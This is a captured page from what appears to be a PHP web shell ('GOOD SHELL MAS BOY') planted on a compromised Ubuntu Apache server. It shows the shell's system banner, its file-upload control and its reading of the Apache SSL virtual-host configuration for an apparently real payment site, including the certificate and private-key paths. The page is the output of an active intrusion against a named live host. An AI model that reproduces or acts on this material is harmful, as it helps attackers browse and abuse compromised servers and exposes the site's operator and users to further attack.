GOOD SHELL MAS BOY
Server: Apache/2.4.52 (Ubuntu)
System: Linux vmi1836763.contaboserver.net 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
User: www-data (33)
PHP: 8.4.10
Disabled: NONE
Upload Files
File: //etc/apache2/sites-available/app.vaspayment.com-le-ssl.conf
<IfModule mod_ssl.c>
    <VirtualHost *:443>
        ServerAdmin webmaster@app.vaspayment.com
        ServerName app.vaspayment.com
        DocumentRoot /var/www/app.vaspayment.com/public

        <Directory /var/www/app.vaspayment.com/public>
            Options Indexes FollowSymLinks
            AllowOverride All
            Require all granted
        </Directory>

        ErrorLog ${APACHE_LOG_DIR}/app.vaspayment.com_error.log
        CustomLog ${APACHE_LOG_DIR}/app.vaspayment.com_access.log combined

        SSLEngine on
        SSLCertificateFile /etc/letsencrypt/live/app.vaspayment.com/fullchain.pem
        SSLCertificateKeyFile /etc/letsencrypt/live/app.vaspayment.com/privkey.pem
        Include /etc/letsencrypt/options-ssl-apache.conf

    </VirtualHost>
</IfModule>